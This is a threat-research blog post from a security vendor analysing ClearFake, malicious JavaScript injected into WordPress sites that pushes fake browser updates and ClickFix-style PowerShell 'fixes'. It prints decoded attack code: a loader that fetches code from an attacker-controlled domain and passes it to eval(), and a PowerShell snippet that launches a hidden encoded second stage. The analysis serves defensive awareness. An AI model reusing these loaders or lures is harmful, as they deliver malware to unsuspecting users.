ClearFake Evolution: The Browser-Based Javascript Malware Exploiting WordPress and Blockchain
ClearFake: Evolution Overview
ClearFake, a malicious JavaScript framework that has been observed in the wild since mid-2023, has changed its techniques several times since its inception. Beyond changing how it obtains its subsequent payloads, from basic requests to an attacker-controlled domain to requests that use blockchain smart contracts, ClearFake has changed its social engineering techniques and its final payloads; all of these are discussed in this article. What has remained constant is its primary target: WordPress sites.
Target: WordPress Sites
WordPress sites remain the target of operators using ClearFake. During research, Keep Aware's threat research function has observed large numbers of ClearFake-compromised WordPress sites. Beyond running WordPress, the compromised sites share no obvious industry or theme, making ClearFake an opportunistic threat to any internet-browsing user.
Now Uses Blockchain
When first identifying ClearFake-compromised sites, a researcher needed to look for a base64-encoded JavaScript snippet that made a synchronous XMLHttpRequest for a second-stage JavaScript payload and passed the response to eval(), as shown below. That payload would start a sequence of fetching further JavaScript files and creating and injecting a full-page iframe element, which displayed a fake browser update notice.
const get_script=()=>{const request=new XMLHttpRequest();request.open('GET','https://hello-world-broken-dust-1f1c.brewasigfi1978.workers.dev/',false);request.send(null);return request.responseText;}
eval(get_script());
Code. The prior snippet of code, base64-decoded.
However, ClearFake soon switched its technique for obtaining subsequent payloads to Binance Smart Chain (BSC) contracts, a blockchain technology offered by Binance. To interact with these contracts, the attacker injects a script element that loads the ethers library into the compromised website:
<script src="https://cdn.ethers.io/lib/ethers-5.2.umd.min.js" type="application/javascript"></script>
This attack is still observed encoding the malicious JavaScript with base64, as shown in the snippet below, though there is more recent evidence that further obfuscation techniques are now in use.
let provider=new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/")
Code. A snippet of code, base64-decoded, illustrating how the ethers library is initially used to interact with BSC contracts.
Social Engineering Then: Fake Update, Malware
ClearFake's original campaign displayed a fake 'update your browser' notice to an unsuspecting internet user, with the notice tailored to the user's browser. In the screenshot below, the user was viewing a compromised site in Chrome.
To lend the fake notice legitimacy, ClearFake uses two notable techniques. First, the notice is a full-screen iframe element that entirely blocks the user from continuing to browse the legitimate but compromised site, which persuades the victim that they need to update their browser to view the site's content.
Second, when the user hovers over the "Update [Browser]" prompt, the URL shown in the bottom-left of the browser window is the browser vendor's legitimate website. For example, if Chrome is the browser in use, the URL shows a Google domain, such as "https://www.google.com/intl/en_uk/chrome/". However, once the "Update [Browser]" button is clicked, the malicious JavaScript changes the button's URL from the legitimate vendor site to a location hosting a malicious executable. Instead of a browser update, the user inadvertently downloads malware.
Social Engineering Now: Fake Error, PowerShell
The ClearFake campaign has since changed its social engineering tactics to display a 'something went wrong' error that prompts the user to copy and paste a "fix" into a PowerShell terminal. This new campaign is also referred to as "ClickFix". The screenshots below show that the malicious prompt is also slightly customized to the browser.
When the user clicks the "Copy Fix" button, JavaScript decodes a base64-encoded string and writes it to the clipboard. All the user has to do is open PowerShell and paste; the pasted code flushes the device's DNS resolver cache, clears the clipboard, starts a new PowerShell process hidden from the user, and downloads and executes further malware. Though some users may be confused or hesitant to follow through with this prompt, those who do subvert the security controls on their own machine and unknowingly hand initial access to the attacker.
ipconfig /flushdns                                   # flush the local DNS resolver cache

# $Diagnostics is base64 for:  Set-Clipboard -Value " ";   (wipes the clipboard contents)
$Diagnostics = "U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==";
$MUI = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Diagnostics));
Invoke-Expression $MUI;

# Start a second PowerShell: -ep sets its execution policy, -w 1 is WindowStyle Hidden,
# and -enc takes the base64-encoded (UTF-16LE) second stage that fetches and runs the malware.
# The encoded payload itself is not reproduced here.
[System.Diagnostics.Process]::Start("powershell", "-ep RemoteSigned -w 1 -enc `"...`"") | Out-Null;

exit;
Code. Malicious base64-decoded PowerShell code from one compromised site that is copied into the user's clipboard and is ready to be pasted into a PowerShell terminal.
Browser as Initial Access
The browser is very often the channel through which threat actors first gain access to personal and business devices. ClearFake, a malicious JavaScript framework injected into otherwise-legitimate WordPress sites, is one example of a web-based campaign that both subverts technical controls by leveraging legitimate domains and socially engineers end users into handing an attacker initial access, whether by downloading malware or, in recent campaigns, by pasting malicious commands into a terminal.
The browser remains a channel often overlooked by most organizations, which is why Keep Aware continues to develop protections against browser-based attacks early in their attack chain and prevent people-targeted attacks. To learn more about the Keep Aware solution, talk to our team today.